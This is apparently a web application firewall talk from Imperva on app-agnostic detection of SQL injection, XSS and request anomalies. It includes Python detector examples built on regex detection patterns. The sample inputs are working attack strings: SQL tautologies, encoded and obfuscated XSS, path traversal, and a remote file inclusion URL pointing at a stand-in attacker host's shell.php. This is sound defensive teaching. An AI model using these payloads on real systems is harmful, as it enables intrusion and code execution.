imperva-incapsula
> ben.childNodes.length
<· 2
> ben.history
<· ["PT", "Dev"]
> ben.employer
<· "Imperva"
> ben.positionX
<· "Research Group Manager"
> ben.social
<· {"TWT": "@KernelXSS", "LNK": "Ben Herzberg"}
© 2017 Imperva, Inc. All rights reserved.
Our “Ground Rules”
As little config as possible
Focus on low false positives (FPs)
Use our CDN to cover more AVs
Being app agnostic…
Example #1: SQL Injection
Queries sent over an application
Pseudo-SQL
“Close Calls”
Being app agnostic…
Example #2: Cross-Site Scripting
HTML sent as part of request
Javascript sent as part of request
Javascript being… Javascript…
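The SQL injection bullets (queries sent over an application, pseudo-SQL, close calls) and the XSS bullets (HTML in the request, JavaScript in the request, JavaScript being JavaScript) describe the same app-agnostic inspection problem from two sides, so one added example covers both. This is illustrative code written for this page, not Imperva's or Incapsula's detection logic; the patterns, the close-call heuristic, the decode depth and the sample values are the author's assumptions, chosen to show why a value can look like SQL or HTML without being an attack.

```python
"""Added example, not Imperva's code: app-agnostic inspection of one request
parameter for SQL injection and XSS. Encoding layers are peeled first so that
a double-URL-encoded or entity-encoded payload is judged on what the backend
would actually see. Rules, thresholds and sample inputs are assumptions made
for illustration, not the vendor's logic."""
import html
import re
from urllib.parse import unquote

SQL_KEYWORDS = {"select", "union", "insert", "update", "delete", "drop",
                "from", "where", "or", "and", "sleep", "benchmark", "exec"}

# SQL *structure*: a quote closing a string followed by a boolean tautology,
# a UNION SELECT, a quote followed by a comment opener, or a stacked query.
SQL_SYNTAX = [
    re.compile(r"'\s*(or|and)\s+[\w'\"]+\s*=\s*[\w'\"]+", re.I),
    re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    re.compile(r"'\s*(--|#|/\*)"),
    re.compile(r";\s*(drop|delete|update|insert|exec)\b", re.I),
]

# JavaScript *execution*: script tags, inline event handlers, javascript: URLs,
# or the usual obfuscation primitives that let "JavaScript be JavaScript".
XSS_SYNTAX = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\b(eval|atob|fromCharCode|setTimeout)\s*\(", re.I),
]
HTML_TAG = re.compile(r"<\s*/?\s*[a-z]\w*", re.I)


def normalize(value, max_rounds=3):
    """Peel URL-encoding and HTML entities until the value stops changing,
    then drop NUL bytes that some parsers treat as string terminators."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value.replace("\x00", "")


def inspect_value(value):
    """Return ('block' | 'close_call' | 'clean', evidence) for one value.

    'block'      - SQL or JavaScript syntax that ordinary input never needs.
    'close_call' - looks like SQL or HTML (several SQL keywords, a bare tag,
                   an apostrophe next to AND/OR) but carries no executable
                   structure; under "focus on low FPs" this is logged, not blocked.
    """
    v = normalize(value)
    sql_hits = [p.pattern for p in SQL_SYNTAX if p.search(v)]
    xss_hits = [p.pattern for p in XSS_SYNTAX if p.search(v)]
    if sql_hits or xss_hits:
        return "block", {"sqli": sql_hits, "xss": xss_hits}
    keywords = set(re.findall(r"[a-z]+", v.lower())) & SQL_KEYWORDS
    if len(keywords) >= 3 or ("'" in v and keywords & {"or", "and"}):
        return "close_call", {"sql_keywords": sorted(keywords)}
    if HTML_TAG.search(v):
        return "close_call", {"html": HTML_TAG.findall(v)}
    return "clean", {}


# Constructed sample parameter values (not captured traffic).
SAMPLES = {
    "1' OR '1'='1": "block",
    "%2527%2520OR%25201%253D1%2520--": "block",        # double URL-encoded
    "&lt;script&gt;alert(1)&lt;/script&gt;": "block",  # entity-encoded
    "<img src=x onerror=\"window['al'+'ert'](1)\">": "block",
    "O'Brien and Sons": "close_call",                  # apostrophe + AND
    "select the union plan from where I live": "close_call",
    "I <b>really</b> liked it": "close_call",          # HTML, no script
    "hello world": "clean",
}

if __name__ == "__main__":
    for value, expected in SAMPLES.items():
        verdict, evidence = inspect_value(value)
        print(f"{verdict:10} {value!r}  {evidence}")
        assert verdict == expected, (value, verdict)
```

The split between `SQL_SYNTAX` (structure) and `SQL_KEYWORDS` (vocabulary) is the whole point: a forum post about "union plans" or a surname like O'Brien trips the vocabulary rule and lands in the close-call bucket for review, while only an actual tautology, comment opener or stacked query is blocked. Decoding until the value is stable is what keeps the check application-agnostic; the inspector does not need to know how many times a given backend will decode.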
Being app agnostic…
Example #4: MISC…
GET + Content-Type + Content-Length
/%00/demo/welcome
src=../../../../windows/bannerWindow/a.jpg
PHP in RFI
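The four MISC bullets above are request-level anomalies rather than payload content: a GET that declares a body, a NUL byte in the path, directory traversal in a parameter, and a PHP file pulled in through remote file inclusion. The following added example checks a constructed request for each of them; it is not Imperva's code, the request representation is a minimal stand-in for a real HTTP parser, and the rule names and the narrowing of the RFI rule to remote `.php` targets and `php://` wrappers are assumptions.

```python
"""Added example, not Imperva's code: request-level checks for the MISC cases
(GET with body, %00 in the path, ../ traversal, PHP in RFI) against a minimal
constructed request. Rule names and the RFI narrowing are assumptions."""
import re
from urllib.parse import parse_qsl, unquote

TRAVERSAL = re.compile(r"(\.\./|\.\.\\){2,}")                  # repeated ../ or ..\
REMOTE_PHP = re.compile(r"^(https?|ftp)://\S+\.php(\?|$)", re.I)  # remote .php target
PHP_WRAPPER = re.compile(r"^php://", re.I)                      # php://input etc.


def check_request(method, target, headers, body=b""):
    """Return the list of anomaly names found in one request.

    method  - HTTP method string
    target  - request-target as it appears on the request line
    headers - dict of header name -> value
    body    - raw body bytes (empty for a normal GET)
    """
    findings = []
    path, _, query = target.partition("?")
    hdrs = {k.lower(): v for k, v in headers.items()}

    # A GET with Content-Type/Content-Length or an actual body is not what a
    # browser sends; it shows up from scanners and parser-confusion tooling.
    if method == "GET" and ("content-length" in hdrs or "content-type" in hdrs or body):
        findings.append("get_with_body")

    # %00 in the path: a NUL terminates strings in C-based parsers, so
    # /%00/demo/welcome can be routed differently by two layers of the stack.
    if "\x00" in unquote(path):
        findings.append("null_byte_in_path")

    for name, value in parse_qsl(query, keep_blank_values=True):
        v = unquote(value)  # parse_qsl decoded once; peel a second layer
        if TRAVERSAL.search(v):
            findings.append(f"path_traversal:{name}")
        if REMOTE_PHP.search(v) or PHP_WRAPPER.search(v):
            findings.append(f"php_in_rfi:{name}")
    return findings


# Constructed requests (not captured traffic).
if __name__ == "__main__":
    cases = [
        ("GET", "/", {"Content-Type": "text/plain", "Content-Length": "5"}, b"hello"),
        ("GET", "/%00/demo/welcome", {}, b""),
        ("GET", "/banner?src=../../../../windows/bannerWindow/a.jpg", {}, b""),
        ("GET", "/index.php?page=http://attacker.example/shell.php", {}, b""),
        ("GET", "/index.php?page=php://input", {}, b""),
        ("POST", "/login", {"Content-Type": "application/x-www-form-urlencoded",
                            "Content-Length": "8"}, b"user=bob"),
    ]
    for method, target, headers, body in cases:
        print(f"{method} {target:55} -> {check_request(method, target, headers, body)}")
```

None of these checks needs to know which application sits behind the proxy, which is what makes them usable "out of the box": a GET with a body, a NUL in a path, or `../../` repeated four times in an image parameter is wrong for every backend. The cost of that generality is the close-call problem again: the traversal rule deliberately requires at least two consecutive `../` so that a single relative reference in a legitimate parameter does not trip it.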
Why?
Create a clear process for Vulnerabilities Management
Give our customers an efficient & prioritised vulnerability response procedure
Unified process
New VR+EF: Scoping
WEB + REMOTE + NO AUTH + CVSS > 9.0 = HPC
10+ TWEETS = HPC
CVSS > 7.0 + 4+ TWEETS = REGULAR+
HAS EXPLOIT OR CVSS > 8.0 = REGULAR
…
SEC INTEL. = HPC
Business Days
[Timeline chart, business days: HPC and REGULAR+ cases across the stages OOS, OOTB, Followup, Mitigation Needed, Emergency Feed]
Weekends
[Timeline chart, weekends: HPC cases across the stages OOS, OOTB, Followup, Mitigation Needed, Emergency Feed]
@KernelXSS, @imperva
Thank You!
Let's Talk! linkedin.com/in/sysadmin